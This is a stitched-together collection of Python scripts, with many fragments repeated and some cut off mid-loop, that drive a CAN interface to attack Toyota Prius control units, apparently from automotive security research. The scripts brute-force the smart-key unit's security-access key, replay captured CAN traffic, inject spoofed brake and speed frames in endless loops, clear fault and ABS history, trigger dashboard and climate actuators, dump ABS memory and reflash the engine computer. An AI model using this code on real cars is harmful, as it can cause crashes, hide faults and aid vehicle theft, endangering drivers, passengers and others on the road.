from PyEcom import * from config import * import time, struct, sys if __name__ == "__main__": ecom = PyEcom('Debug\\ecomcat_api') ecom.open_device(0, 1) ECU = 0x7E0 #Is CPU? ret = ecom.send_iso_tp_data(ECU, [0x09, 0x00]) #Get Calibration IDs ret = ecom.send_iso_tp_data(ECU, [0x09, 0x04]) #???? ret = ecom.send_iso_tp_data(ECU, [0x13, 0x80]) #Get VIN ret = ecom.send_iso_tp_data(ECU, [0x09, 0x04]) ret = ecom.security_access(ECU) if ret: print "[*] [0x%04X] Security Access: Success" % (ECU) #Unsure but this happens 3x in the capture before diag programming mode #I think this may have to do w/ tellin other ECUs the one being reprogrammed #is going offline for a while and DO NOT set DTC codes for i in range(0, 3):
from PyEcom import * from config import * from ctypes import * import time, struct if __name__ == "__main__": ecom = PyEcom('Debug\\ecomcat_api') ecom.open_device(1,37436) #f = open("can2-startup-min-drivers.dat", "r") f = open("can2-passenger.dat", "r") sff_lines = f.readlines() num_of_sffs = len(sff_lines) SFFArray = SFFMessage * num_of_sffs sffs = SFFArray() for i in range(0, num_of_sffs): ecom.mydll.DbgLineToSFF(sff_lines[i], pointer(sffs[i])) print "Starting to send msgs" #ecom.mydll.write_messages_from_file(ecom.handle, "input.dat") #ecom.send_iso_tp_data(0x781, [0x30, 0x01, 0x00, 0x01]) while(1): ## for i in range(0, 30): ## ecom.mydll.write_message(ecom.handle, sff_0024_F9) ## ## for i in range(0, 4): ## ecom.mydll.write_message(ecom.handle, sff_0344)
ecu_b1 = EcuBlock(0x00000000, 0xFF000000, 0x1000) ecu_b2 = EcuBlock(0xF7000100, 0xFF001000, None) blocks = [] blocks.append(ecu_b1) blocks.append(ecu_b2) #val = ecom.toyota_targetdata_to_dword("424433493A4B4B4D") #ECM Calibration 34715200 #T-0052-11.cuw 03_TargetData=424433493A4B4B4D #target_data = 0xBC1F6FEF target_data = nbo_int_to_bytearr(0xBC1F6FEF) if __name__ == "__main__": #print "[*] Starting diagnostics check..." ecom = PyEcom('Debug\\ecomcat_api') ecom.open_device(0,1) #Set this to False if flashing fails and the script needs re-run PREAMBLE = False #flash binary f = open("toyota_ecm.bin", "rb") #START PREAMBLE if PREAMBLE == True: #ret = ecom.send_iso_tp_data(0x7E1, [0x09, 0x00]) #Supported PIDs (Bit Encoded) ret = ecom.send_iso_tp_data(ECU, [0x09, 0x00])
from PyEcom import * from config import * from ctypes import * import time, struct if __name__ == "__main__": ecom = PyEcom('Debug\\ecomcat_api') ecom.open_device(1, 37440) #ecom.open_device(1,0) ecom.send_iso_tp_data(0x781, [0x30, 0x01, 0x00, 0x01]) time.sleep(3) ecom.send_iso_tp_data(0x781, [0x30, 0x01, 0x00, 0x02]) #read one message (should contain payload of: 0x08) #sff = pointer(SFFMessage()) #ecom.mydll.DbgLineToSFF("IDH: 03, IDL: 44, Len: 08, Data: FF 7F 00 00 00 08 00 D5", sff) #ret = ecom.send_iso_tp_data(0x781, [0x3E]) #ecom.mydll.write_messages_from_file(ecom.handle, "input.dat") #ecom.send_iso_tp_data(0x781, [0x30, 0x01, 0x00, 0x01]) #ret = ecom.mydll.read_message_by_wid(ecom.handle, 0x039C) #ecom.mydll.write_messages_from_file(ecom.handle, "car-startup-trim.dat") #ret = ecom.mydll.read_message_by_wid(ecom.handle, 0x039C) #ecom.mydll.write_messages_from_file(ecom.handle, "car-startup-trim.dat")
arr.append((dword >> 16) & 0xFF) arr.append((dword >> 24) & 0xFF) return arr class EcuPart: def __init__(self, address, write_address, length): self.address = address self.write_address = write_address self.length = length if __name__ == "__main__": ecom = PyEcom('Debug\\ecomcat_api') ecom.open_device(1, 35916) ECU = 0x750 #SmartKey 0x750 [0xB5] seems to return 34 when ret[2] - 0xAB for i in range(0, 1000): ret = ecom.send_iso_tp_data(0x750, [0x27, 0x01], 0x40) #key = (ret[2] - 0xAB) & 0xFF #key = (~ret[2] + 1) & 0xFF key = i & 0xFF ret = ecom.send_iso_tp_data(0x750, [0x27, 0x02, key], 0x40) if ret[2] != 0x35: print "New Error: %d %d" % (key, i)
from PyEcom import * from config import * from ctypes import * import time, struct if __name__ == "__main__": ecom = PyEcom('Debug\\ecomcat_api') ecom.open_device(1, 37440) #Changed data[3] (0x80) to 0x40 if you want beeping SFFLINE = "IDH: 02, IDL: E4, Len: 05, Data: 80 05 00 80 F0" SFFArray = SFFMessage * 1 SFFS = SFFArray() ecom.mydll.DbgLineToSFF(SFFLINE, pointer(SFFS[0])) while (1): SFFS[0].data[0] += 1 & 0xFF SFFS[0].data[0] |= 0x80 ecom.mydll.FixChecksum(pointer(SFFS[0])) #ecom.mydll.PrintSFF(pointer(SFFS[0]), 0) ecom.mydll.write_message(ecom.handle, pointer(SFFS[0]))
from PyEcom import * from config import * from ctypes import * import time, struct if __name__ == "__main__": ecom = PyEcom('Debug\\ecomcat_api') ecom.open_device(1, 35916) LOOPER = 0 f = open("regular.dat", "r") sff_lines = f.readlines() num_of_sffs = len(sff_lines) SFFArray = SFFMessage * num_of_sffs sffs = SFFArray() for i in range(0, num_of_sffs): ecom.mydll.DbgLineToSFF(sff_lines[i], pointer(sffs[i])) print "Starting to send wheel msgs" while (1): for i in range(0, num_of_sffs): ecom.mydll.write_message(ecom.handle, pointer(sffs[i]))
from PyEcom import * from config import * if __name__ == "__main__": print "[*] Starting Prius diagnostics check..." ecom = PyEcom('Debug\\ecomcat_api') ecom.open_device(0,1) diag_req = [0x10, PriusDiagCode] for ecu_num, ecu_str in PriusECU.iteritems(): print "DaigCheck...[0x%04X] => %s..." % (ecu_num, ecu_str) ret = ecom.diagnostic_session(ecu_num, diag_req) if(not ret): print "FAILED\n" else: print "SUCCEEDED!\n" for ecu_sub_num, ecu_str in PriusMainECU.iteritems(): print "DiagCheck...[0x0750:0x%02X] => %s..." % (ecu_sub_num, ecu_str) ret = ecom.diagnostic_session(0x750, diag_req, ecu_sub_num) if(not ret): print "FAILED\n" else: print "SUCCEEDED!\n"
from PyEcom import * from config import * import time, struct if __name__ == "__main__": #print "[*] Starting diagnostics check..." ecom = PyEcom('Debug\\ecomcat_api') ecom.open_device(1,35916) #It looks like all commands for 'active tests' use the 0x30 #service which is 'inputOutputControlByLocalIdentifier' (see ISO 14230/14229) ## Clear DTC codes for all ECUs ## for ecu_num, ecu_name in PriusECU.iteritems(): ## ecom.send_iso_tp_data(ecu_num, [0x04]) ## ecom.send_iso_tp_data(ecu_num, [0x14]) ## for ecu_sub_num, ecu_name in PriusMainECU.iteritems(): ## ecom.send_iso_tp_data(0x750, [0x04], ecu_sub_num) #Clear steering abnormalities history #ecom.send_iso_tp_data(0x7A1, [0xA6, 0x00]) #Clear ABS history #ecom.send_iso_tp_data(0x7B0, [0xA6, 0x00]) #AC Turn blower on 00-1F (00-31 decimal) [driving] #ecom.send_iso_tp_data(0x7C4, [0x30, 0x02, 0x00, 0x1F]) #Combo Meter Fuel Empty + beep [driving] #ecom.send_iso_tp_data(0x7C0, [0x30, 0x03, 0x00, 0x01])
from PyEcom import * from config import * import time, struct, sys if __name__ == "__main__": ecom = PyEcom("Debug\\ecomcat_api") ecom.open_device(0, 1) ECU = 0x7E0 # Is CPU? ret = ecom.send_iso_tp_data(ECU, [0x09, 0x00]) # Get Calibration IDs ret = ecom.send_iso_tp_data(ECU, [0x09, 0x04]) # ???? ret = ecom.send_iso_tp_data(ECU, [0x13, 0x80]) # Get VIN ret = ecom.send_iso_tp_data(ECU, [0x09, 0x04]) ret = ecom.security_access(ECU) if ret: print "[*] [0x%04X] Security Access: Success" % (ECU) # Unsure but this happens 3x in the capture before diag programming mode # I think this may have to do w/ tellin other ECUs the one being reprogrammed # is going offline for a while and DO NOT set DTC codes for i in range(0, 3):
from PyEcom import * from config import * from ctypes import * import time, struct if __name__ == "__main__": ecom = PyEcom('Debug\\ecomcat_api') ecom.open_device(1,35916) #Engine ECU ECU = 0x7E0 for i in range(0, 11): print "Attempt %d" % (i) resp = ecom.send_iso_tp_data(ECU, ecom.get_security_access_payload(ECU), None) if not resp or len(resp) == 0: print "No Response" seed = resp[2] << 24 | resp[3] << 16 | resp[4] << 8 | resp[5] #obviously incorrect key = [0,0,0,0] key_data = [0x27, 0x02, key[0], key[1], key[2], key[3]] key_resp = ecom.send_iso_tp_data(ECU, key_data, None) err = ecom.get_error(key_resp) if err != 0x00: print "Error: %s" % (NegRespErrStr(err))
#Client CAN ID which will be sending data/requests CID = 0x0001 #Server CAN ID which will be receiving data/requests SID = 0x0002 #val = ecom.toyota_targetdata_to_dword("424433493A4B4B4D") #ECM Calibration 34715200 #T-0052-11.cuw 03_TargetData=424433493A4B4B4D #target_data = 0xBC1F6FEF target_data = nbo_int_to_bytearr(0xBC1F6FEF) if __name__ == "__main__": #print "[*] Starting diagnostics check..." ecom = PyEcom('Debug\\ecomcat_api') ecom.open_device(0,1) PREAMBLE = False #START PREAMBLE if PREAMBLE == True: #ret = ecom.send_iso_tp_data(0x7E1, [0x09, 0x00]) #Supported PIDs (Bit Encoded) ret = ecom.send_iso_tp_data(ECU, [0x09, 0x00]) #Get Calibration IDs ret = ecom.send_iso_tp_data(ECU, [0x09, 0x04])
from PyEcom import * from config import * if __name__ == "__main__": print "[*] Starting Prius diagnostics check..." ecom = PyEcom('Debug\\ecomcat_api') ecom.open_device(0, 1) diag_req = [0x10, PriusDiagCode] for ecu_num, ecu_str in PriusECU.iteritems(): print "DaigCheck...[0x%04X] => %s..." % (ecu_num, ecu_str) ret = ecom.diagnostic_session(ecu_num, diag_req) if (not ret): print "FAILED\n" else: print "SUCCEEDED!\n" for ecu_sub_num, ecu_str in PriusMainECU.iteritems(): print "DiagCheck...[0x0750:0x%02X] => %s..." % (ecu_sub_num, ecu_str) ret = ecom.diagnostic_session(0x750, diag_req, ecu_sub_num) if (not ret): print "FAILED\n" else: print "SUCCEEDED!\n"
from PyEcom import * from config import * from ctypes import * import time, struct if __name__ == "__main__": ecom = PyEcom('Debug\\ecomcat_api') ecom.open_device(1, 35916) #Engine ECU ECU = 0x7E0 for i in range(0, 11): print "Attempt %d" % (i) resp = ecom.send_iso_tp_data(ECU, ecom.get_security_access_payload(ECU), None) if not resp or len(resp) == 0: print "No Response" seed = resp[2] << 24 | resp[3] << 16 | resp[4] << 8 | resp[5] #obviously incorrect key = [0, 0, 0, 0] key_data = [0x27, 0x02, key[0], key[1], key[2], key[3]] key_resp = ecom.send_iso_tp_data(ECU, key_data, None) err = ecom.get_error(key_resp) if err != 0x00:
from PyEcom import * from config import * import time, struct if __name__ == "__main__": #print "[*] Starting diagnostics check..." ecom = PyEcom('Debug\\ecomcat_api') ecom.open_device(1, 35916) #Engine #ECU = 0x7E0 #Hybrid/Power Management #ECU = 0x7E2 #ABS ECU = 0x7B0 ret = ecom.security_access(ECU) ret = ecom.request_upload_14229(ECU, 0x01, 0x44, 0x0000F000, 0x00000001) ret = ecom.request_upload_14229(ECU, 0x01, 0x33, 0x0000F000, 0x00000001) ret = ecom.request_upload_14229(ECU, 0x01, 0x24, 0x0000F000, 0x00000001) ret = ecom.request_upload_14229(ECU, 0x01, 0x22, 0x0000F000, 0x00000001) ret = ecom.request_upload_14229(ECU, 0x01, 0x12, 0x0000F000, 0x00000001) ret = ecom.request_upload_14230(ECU, 0x01, 0x0000F000, 0x00000001) ret = ecom.read_memory_14229(ECU, 0x44, 0x0000F000, 0x00000001) ret = ecom.read_memory_14229(ECU, 0x24, 0x0000F000, 0x00000001) ret = ecom.read_memory_14229(ECU, 0x33, 0x0000F000, 0x00000001)
from PyEcom import * from config import * from ctypes import * import time, struct if __name__ == "__main__": ecom = PyEcom('Debug\\ecomcat_api') ecom.open_device(1,37440) brake_sff_str = "IDH: 02, IDL: 83, Len: 07, Data: 61 00 E0 BE 8C 00 17" brake_sff = SFFMessage() ecom.mydll.DbgLineToSFF(brake_sff_str, pointer(brake_sff)) print "Starting to send msgs" while(1): brake_sff.data[0] += 1 & 0x7F ecom.mydll.FixChecksum(pointer(brake_sff)) #ecom.mydll.PrintSFF(pointer(brake_sff), 0) ecom.mydll.write_message(ecom.handle, pointer(brake_sff)) time.sleep(.001)
from PyEcom import * from config import * from ctypes import * import time, struct if __name__ == "__main__": ecom = PyEcom('Debug\\ecomcat_api') ecom.open_device(1,35916) LOOPER = 0 f = open("wheel.dat", "r") sff_lines = f.readlines() num_of_sffs = len(sff_lines) SFFArray = SFFMessage * num_of_sffs sffs = SFFArray() for i in range(0, num_of_sffs): ecom.mydll.DbgLineToSFF(sff_lines[i], pointer(sffs[i])) print "Starting to send wheel msgs" while(1): for i in range(0, num_of_sffs): ecom.mydll.write_message(ecom.handle, pointer(sffs[i])) time.sleep(.001)
ecu_b1 = EcuBlock(0x00000000, 0xFF000000, 0x1000) ecu_b2 = EcuBlock(0xF7000100, 0xFF001000, None) blocks = [] blocks.append(ecu_b1) blocks.append(ecu_b2) #val = ecom.toyota_targetdata_to_dword("424433493A4B4B4D") #ECM Calibration 34715200 #T-0052-11.cuw 03_TargetData=424433493A4B4B4D #target_data = 0xBC1F6FEF target_data = nbo_int_to_bytearr(0xBC1F6FEF) if __name__ == "__main__": #print "[*] Starting diagnostics check..." ecom = PyEcom('Debug\\ecomcat_api') ecom.open_device(0, 1) #Set this to False if flashing fails and the script needs re-run PREAMBLE = False #flash binary f = open("toyota_ecm.bin", "rb") #START PREAMBLE if PREAMBLE == True: #ret = ecom.send_iso_tp_data(0x7E1, [0x09, 0x00]) #Supported PIDs (Bit Encoded) ret = ecom.send_iso_tp_data(ECU, [0x09, 0x00])
from PyEcom import * from config import * from ctypes import * import time, struct if __name__ == "__main__": ecom = PyEcom("Debug\\ecomcat_api") ecom.open_device(1, 37440) # ecom.open_device(1,0) ecom.send_iso_tp_data(0x781, [0x30, 0x01, 0x00, 0x01]) time.sleep(3) ecom.send_iso_tp_data(0x781, [0x30, 0x01, 0x00, 0x02]) # read one message (should contain payload of: 0x08) # sff = pointer(SFFMessage()) # ecom.mydll.DbgLineToSFF("IDH: 03, IDL: 44, Len: 08, Data: FF 7F 00 00 00 08 00 D5", sff) # ret = ecom.send_iso_tp_data(0x781, [0x3E]) # ecom.mydll.write_messages_from_file(ecom.handle, "input.dat") # ecom.send_iso_tp_data(0x781, [0x30, 0x01, 0x00, 0x01]) # ret = ecom.mydll.read_message_by_wid(ecom.handle, 0x039C) # ecom.mydll.write_messages_from_file(ecom.handle, "car-startup-trim.dat") # ret = ecom.mydll.read_message_by_wid(ecom.handle, 0x039C) # ecom.mydll.write_messages_from_file(ecom.handle, "car-startup-trim.dat")
from PyEcom import * from config import * import time, struct if __name__ == "__main__": #print "[*] Starting diagnostics check..." ecom = PyEcom('Debug\\ecomcat_api') ecom.open_device(1,35916) #Engine #ECU = 0x7E0 #Hybrid/Power Management #ECU = 0x7E2 #ABS ECU = 0x7B0 ret = ecom.security_access(ECU) ret = ecom.request_upload_14229(ECU, 0x01, 0x44, 0x0000F000, 0x00000001) ret = ecom.request_upload_14229(ECU, 0x01, 0x33, 0x0000F000, 0x00000001) ret = ecom.request_upload_14229(ECU, 0x01, 0x24, 0x0000F000, 0x00000001) ret = ecom.request_upload_14229(ECU, 0x01, 0x22, 0x0000F000, 0x00000001) ret = ecom.request_upload_14229(ECU, 0x01, 0x12, 0x0000F000, 0x00000001) ret = ecom.request_upload_14230(ECU, 0x01, 0x0000F000, 0x00000001) ret = ecom.read_memory_14229(ECU, 0x44, 0x0000F000, 0x00000001) ret = ecom.read_memory_14229(ECU, 0x24, 0x0000F000, 0x00000001) ret = ecom.read_memory_14229(ECU, 0x33, 0x0000F000, 0x00000001)
from PyEcom import * from config import * from ctypes import * import time, struct if __name__ == "__main__": ecom = PyEcom('Debug\\ecomcat_api') ecom.open_device(1,37440) LOOPER = 0 SETSPEED = 62 SFFLINE = "IDH: 07, IDL: C0, Len: 08, Data: 04 30 01 00 02 00 00 00" SFFArray = SFFMessage * 1 SFFS = SFFArray() ecom.mydll.DbgLineToSFF(SFFLINE, pointer(SFFS[0])) #if(SETSPEED < 200): # SETSPEED = SETSPEED * 161 #SFFS[0].data[0] = (SETSPEED >> 8) & 0xFF; #SFFS[0].data[1] = SETSPEED & 0xFF; #ecom.mydll.FixChecksum(pointer(SFFS[0])) while(1): ecom.send_iso_tp_data(0x7C0, [0x30, 0x01, 0x00, 0x08])
#Client CAN ID which will be sending data/requests CID = 0x0001 #Server CAN ID which will be receiving data/requests SID = 0x0002 #val = ecom.toyota_targetdata_to_dword("424433493A4B4B4D") #ECM Calibration 34715200 #T-0052-11.cuw 03_TargetData=424433493A4B4B4D #target_data = 0xBC1F6FEF target_data = nbo_int_to_bytearr(0xBC1F6FEF) if __name__ == "__main__": #print "[*] Starting diagnostics check..." ecom = PyEcom('Debug\\ecomcat_api') ecom.open_device(0, 1) PREAMBLE = False #START PREAMBLE if PREAMBLE == True: #ret = ecom.send_iso_tp_data(0x7E1, [0x09, 0x00]) #Supported PIDs (Bit Encoded) ret = ecom.send_iso_tp_data(ECU, [0x09, 0x00]) #Get Calibration IDs ret = ecom.send_iso_tp_data(ECU, [0x09, 0x04])
from PyEcom import * from config import * import time, struct, sys if __name__ == "__main__": #print "[*] Starting diagnostics check..." ecom = PyEcom('Debug\\ecomcat_api') ecom.open_device(1,35916) ECU = 0x7E0 #do security access ret = ecom.security_access(ECU) if ret == False: print "[!] [0x%04X] Security Access: FAILURE" % (ECU) sys.exit(1) print "[*] [0x%04X] Security Access: Success" % (ECU) #Unsure but this happens 3x in the capture before diag programming mode #I think this may have to do w/ tellin other ECUs the one being reprogrammed #is going offline for a while and DO NOT set DTC codes for i in range(0, 3): ret = ecom.send_iso_tp_data(0x720, [0xA0, 0x27]) #Grequires the to be in half-on state (power on, engine off) #Failure to be in the required mode will result in diagnostic session failing ret = ecom.diagnostic_session(ECU, [0x10, 0x02]) if ret == False: print "[!] [0x%04X] Programming Mode: Failure" % (ECU) sys.exit(1)
arr.append(dword & 0xFF) arr.append((dword >> 8) & 0xFF) arr.append((dword >> 16) & 0xFF) arr.append((dword >> 24) & 0xFF) return arr class EcuPart: def __init__(self, address, write_address, length): self.address = address self.write_address = write_address self.length = length if __name__ == "__main__": ecom = PyEcom('Debug\\ecomcat_api') ecom.open_device(1,35916) ECU = 0x750 #SmartKey 0x750 [0xB5] seems to return 34 when ret[2] - 0xAB for i in range(0, 1000): ret = ecom.send_iso_tp_data(0x750, [0x27, 0x01], 0x40) #key = (ret[2] - 0xAB) & 0xFF #key = (~ret[2] + 1) & 0xFF key = i & 0xFF ret = ecom.send_iso_tp_data(0x750, [0x27, 0x02, key], 0x40) if ret[2] != 0x35: print "New Error: %d %d" % (key, i)